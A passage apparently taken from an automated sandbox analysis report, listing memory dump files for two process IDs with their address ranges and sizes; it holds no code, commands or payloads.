10.8MB
-
memory/1740-58-0x0000000000830000-0x0000000001302000-memory.dmpFilesize
10.8MB
-
memory/1740-59-0x0000000000830000-0x0000000001302000-memory.dmpFilesize
10.8MB
-
memory/1740-60-0x0000000076F90000-0x0000000077110000-memory.dmpFilesize
1.5MB
-
memory/1740-61-0x0000000000830000-0x0000000001302000-memory.dmpFilesize
10.8MB
-
memory/1740-66-0x0000000000830000-0x0000000001302000-memory.dmpFilesize
10.8MB
-
memory/1808-72-0x000000013FCD0000-0x0000000140628000-memory.dmpFilesize
9.3MB
-
memory/1808-69-0x000000013FCD0000-0x0000000140628000-memory.dmpFilesize
9.3MB
-
memory/1808-68-0x000000013FCD0000-0x0000000140628000-memory.dmpFilesize
9.3MB
-
memory/1808-70-0x000000013FCD0000-0x0000000140628000-memory.dmpFilesize
9.3MB
-
memory/1808-63-0x0000000000000000-mapping.dmp
-
memory/1808-71-0x0000000076DB0000-0x0000000076F59000-memory.dmpFilesize
1.7MB
-
memory/1808-83-0x0000000076DB0000-0x0000000076F59000-memory.dmpFilesize
1.7MB
-
memory/1808-73-0x000007FEFB631000-0x000007FEFB633000-memory.dmpFilesize
8KB
-
memory/1808-80-0x000000013FCD0000-0x0000000140628000-memory.dmpFilesize
9.3MB
-
memory/1808-82-0x00000000003E0000-0x00000000003F0000-memory.dmpFilesize
64KB